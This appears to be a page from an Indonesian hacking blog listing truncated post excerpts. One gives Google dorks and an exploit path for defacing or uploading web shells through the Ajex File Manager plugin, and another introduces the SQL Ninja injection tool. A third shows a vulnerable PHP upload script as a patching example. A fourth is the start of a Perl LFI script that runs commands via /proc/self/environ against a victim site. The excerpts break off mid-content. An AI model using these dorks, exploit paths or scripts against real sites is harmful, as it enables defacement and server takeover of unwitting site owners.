Ajex File Manager [Deface Or Shell Upload]

Assalamualaikum Hallo sahabat Binus Hacker ? apa kabar nya ? Okay pertemuan dengan saya kali ini akan memahas tentang hacking lagi Yapz seputar deface. Tak mau lama menunggu ? mari kita bahas ya bersama.   Google Dork: - intitle: Ajex.FileManager - inurl: /plugins/editors/AjexFileManager/ *Think it again Exploit: - http://[localhost]/patch/plugins/editors/ajexfilemanager/index.html Preview: You can see if succses [...]

SQL Ninja Hacker Tools

SQL Ninja merupakan sebuah tool yang digunakan untuk SQL Injection dan merupakan tools  untuk megambil alih database. Pada intinya SQL Ninja adalah alat yang ditargetkan untuk mengeksploitasi kelemahan SQL Injection pada aplikasi web yang menggunakan Microsoft SQL Server sebagai back end-nya dan juga sebagian lainnya. Tujuan utama SQL Ninja adalah untuk menyediakan akses remote pada [...]

PHP Arbitrary File Upload Simple Patching

Saya akan membahas tentang cara simple mempatch PHP Arbitrary File Upload. Kebanyakan website yang vuln diupload memiliki garis besar seperti ini: Contoh simple upload.php file upload. <span style="color: #0000ff;">&lt;?php $uploaddir = 'uploads/'; // Relative path under webroot $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo "File is valid, and was successfully uploaded.\n"; } [...]

LFI Remote Execute in PERL

Script berikut untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell. #! /usr/bin/perl use LWP; use HTTP::Request; if (@ARGV < 1) { print "\n==========================================\n"; print " LFI Command Execution \n"; print "==========================================\n"; print "Usage: perl LFI.pl (without http:://)\n"; print "Ex. perl FLI.pl www.korban.com/index.php?page=\n"; exit; } $host=$ARGV[0]; $lfi = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron"; print "Try to Execution Command!\n"; print "iDSc-shell# [...]